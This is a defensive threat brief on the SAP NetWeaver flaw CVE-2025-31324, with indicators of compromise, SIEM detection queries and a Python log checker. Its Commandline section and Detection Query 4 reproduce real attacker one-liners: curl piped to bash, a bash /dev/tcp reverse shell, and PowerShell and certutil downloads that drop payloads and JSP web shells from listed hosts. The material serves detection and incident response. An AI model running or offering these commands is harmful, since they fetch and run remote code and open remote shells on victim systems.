Threat Brief: CVE-2025-31324

    Date: 05/13/2025

    Severity: Medium

    Summary

    On April 24, 2025, SAP disclosed CVE-2025-31324, a critical vulnerability (CVSS 10.0) in SAP NetWeaver’s Visual Composer Framework (version 7.50). This flaw allows unauthenticated attackers to upload arbitrary files via the /developmentserver/metadatauploader endpoint, potentially leading to remote code execution and full system compromise. Incident response findings revealed attackers deploying web shells (e.g., helper.jsp, cache.jsp), reverse shells, and reverse SSH SOCKS proxies for persistent access.

    Indicators of Compromise (IOC) List

    URL/Domains

    ocr-freespace.oss-cn-beijing.aliyuncs.com

    overseas-recognized-athens-oakland.trycloudflare.com

    d-69b.pages.dev

    Commandline

    curl 138.68.61.82|bash

    bash -i >& /dev/tcp/138.68.61.82/4544 0>&1

    curl -sk hxxps://overseas-recognized-athens-oakland.trycloudflare.com/v2.js || wget --no-check-certificate -q -O - hxxps://overseas-recognized-athens-oakland.trycloudflare.com/v2.js) | bash -sh

    powershell Invoke-WebRequest -Uri "hxxp://31.192.107.157:38205/ReportQueue.exe" -OutFile "C:\programdata\ReportQueue.exe"

    powershell Invoke-WebRequest -Uri "hxxp://158.247.224.100:38205/EACA38DB.tmp" -OutFile "C:\programdata\EACA38DB.tmp"

    powershell curl -o "C:\users\public\ansgdhs.bat" hxxp://101.32.26.154/rymhNszS/ansgdhs.bat

    powershell IEX(New-Object Net.WebClient).DownloadString('hxxps://d-69b.pages.dev/sshb64.ps1')

    certutil.exe -urlcache -split -f hxxp://108.171.195.163:8000/$FILE_NAME$.txt ~\sap.com\irj\servlet_jsp\irj\root\Logout.jsp

    powershell (new-object Net.WebClient).DownloadFile('hxxp://108.171.195.163:8000/$FILE_NAME$.txt ,'~\sap.com\irj\servlet_jsp\irj\root\Logout.jsp')

    powershell Invoke-WebRequest -Uri "hxxp://65.49.235.210/download/2.jpg" -OutFile "cmake.exe"

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1

    domainname like "ocr-freespace.oss-cn-beijing.aliyuncs.com" or siteurl like "ocr-freespace.oss-cn-beijing.aliyuncs.com" or url like "ocr-freespace.oss-cn-beijing.aliyuncs.com" or domainname like "overseas-recognized-athens-oakland.trycloudflare.com" or siteurl like "overseas-recognized-athens-oakland.trycloudflare.com" or url like "overseas-recognized-athens-oakland.trycloudflare.com" or domainname like "d-69b.pages.dev" or siteurl like "d-69b.pages.dev" or url like "d-69b.pages.dev"

    Detection Query 2

    dstipaddress IN ("138.68.61.82","205.169.39.55","206.188.197.52","65.49.235.210","31.192.107.157","108.171.195.163","47.97.42.177","45.76.93.60","158.247.224.100","107.173.135.116","192.3.153.18","188.166.87.88","223.184.254.150","51.79.66.183","85.106.113.168","101.99.91.107","103.207.14.195","13.232.191.219") or srcipaddress IN ("138.68.61.82","205.169.39.55","206.188.197.52","65.49.235.210","31.192.107.157","108.171.195.163","47.97.42.177","45.76.93.60","158.247.224.100","107.173.135.116","192.3.153.18","188.166.87.88","223.184.254.150","51.79.66.183","85.106.113.168","101.99.91.107","103.207.14.195","13.232.191.219")

    Detection Query 3

    sha256hash IN ("5919F2EAB8A826D7BA84E6C413626F5D11ED412D7DF0D3AB864F31D3A8DB3763","888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef","598b38f44564565e0e76aa604f915ad88a20a8d5b5827151e681c8866b7ea8b0","b3e4c4018f2d18ec93a62f59b5f7341321aff70d08812a4839b762ad3ade74ee","5a8ddc779dcf124fe5692d15be44346fb6d742322acb0eb3c6b4e90f581c5f9e","df492597eb412c94155a7f437f593aed89cfec2f1f149eb65174c6201be69049","9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d","c7b9ae61046eed01651a72afe7a31de088056f1c1430b368b1acda0b58299e28","3f5fd4b23126cb21d1007b479954af619a16b0963a51f45cc32a8611e8e845b5","427877aadd89f427e1815007998d9bb88309c548951a92a6e4064df001e327c2","69bb809b3fee09ed3ec9138f7566cc867bd6f1e8949b5e3daff21d451c533d75","1abf922a8228fd439a72cfddf1ed08ea09b59eaa4ae5eeba1d322d5f3e3c97e8","2e6f348f8296f4e062c397d2f3708ca6fdeab2c71edfd130b2ca4c935e53c0d3","6c6c984727dc53af110ed08ec8b15092facb924c8ad62e86ec76b52a00a41a40","4b17beee8c2d94cf8e40efc100651d70d046f5c14a027cf97d845dc839e423f9","7aab6ec707988ff3eec37f670b6bb0e0ddd02cc0093ead78eb714abded4d4a79")

    Detection Query 4

    commandline IN ("curl 138.68.61.82|bash","bash -i >& /dev/tcp/138.68.61.82/4544 0>&1","curl -sk https://overseas-recognized-athens-oakland.trycloudflare.com/v2.js || wget --no-check-certificate -q -O - https://overseas-recognized-athens-oakland.trycloudflare.com/v2.js) | bash -sh","powershell Invoke-WebRequest -Uri \"http://31.192.107.157:38205/ReportQueue.exe\" -OutFile \"C:\\programdata\\ReportQueue.exe\"","powershell Invoke-WebRequest -Uri \"http://158.247.224.100:38205//EACA38DB.tmp\" -OutFile \"C:\\programdata\\EACA38DB.tmp\"","powershell curl -o \"C:\\users\\public\\ansgdhs.bat\" http://101.32.26.154/rymhNszS/ansgdhs.bat","powershell IEX(New-Object Net.WebClient).DownloadString('https://d-69b.pages.dev/sshb64.ps1')","certutil.exe -urlcache -split -f http://108.171.195.163:8000/$FILE_NAME$.txt ~\\sap.com\\irj\\servlet_jsp\\irj\\root\\Logout.jsp","powershell (new-object Net.WebClient).DownloadFile('http://108.171.195.163:8000/$FILE_NAME$.txt ,'~\\sap.com\\irj\\servlet_jsp\\irj\\root\\Logout.jsp')","powershell Invoke-WebRequest -Uri \"http://65.49.235.210//download//2.jpg\" -OutFile \"cmake.exe\"")
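    As an added example (not part of the Unit 42 brief or of Gurucul's TDIR queries), a small Python checker that applies the indicators from the Summary and the Commandline section to constructed log data: it flags POSTs to the metadatauploader endpoint, requests for the named web shells, IOC hosts appearing in process command lines, and the download-cradle and reverse-shell shapes listed above. The CLF-style access-log format, the sample lines and the detection names are assumptions.

```python
import re
from typing import List

# Indicators taken from the brief above; everything else here is assumed/constructed.
UPLOAD_ENDPOINT = "/developmentserver/metadatauploader"
WEBSHELL_NAMES = {"helper.jsp", "cache.jsp"}
IOC_HOSTS = {
    "ocr-freespace.oss-cn-beijing.aliyuncs.com",
    "overseas-recognized-athens-oakland.trycloudflare.com",
    "d-69b.pages.dev",
    "138.68.61.82", "31.192.107.157", "158.247.224.100",
    "108.171.195.163", "65.49.235.210",
}
# Shapes of the download cradles / reverse shell in the Commandline IOCs, matched by technique.
CRADLE_RE = re.compile(
    r"/dev/tcp/|certutil(\.exe)?\s+-urlcache|DownloadString|DownloadFile|Invoke-WebRequest",
    re.IGNORECASE,
)
# Assumed CLF-style access log: client ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def check_http_line(line: str) -> List[str]:
    """Detection names that fire for one HTTP access-log line (empty if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []                       # unparseable line: nothing to assert on
    path = m.group("path").split("?", 1)[0].lower()
    hits = []
    if m.group("method").upper() == "POST" and path == UPLOAD_ENDPOINT:
        hits.append("metadatauploader-post")     # the unauthenticated upload path
    if path.rsplit("/", 1)[-1] in WEBSHELL_NAMES:
        hits.append("known-webshell-name")       # helper.jsp / cache.jsp being served
    return hits

def check_commandline(cmd: str) -> List[str]:
    """Detection names that fire for one process command line (empty if none)."""
    hits = []
    if any(host in cmd.lower() for host in IOC_HOSTS):
        hits.append("ioc-host-in-commandline")   # same intent as Detection Query 1/2
    if CRADLE_RE.search(cmd):
        hits.append("download-cradle-or-reverse-shell")
    return hits

# Constructed sample: one exploitation-shaped upload request, then a web shell fetch.
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Apr/2025:10:00:00 +0000] "POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL HTTP/1.1" 200 512',
    '203.0.113.7 - - [24/Apr/2025:10:00:05 +0000] "GET /irj/root/helper.jsp HTTP/1.1" 200 64',
]
```

    Run it against your own NetWeaver access logs and EDR command-line telemetry by feeding each line to check_http_line or check_commandline; a non-empty result is a lead for investigation, not proof of compromise.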

    Reference:  

    https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/

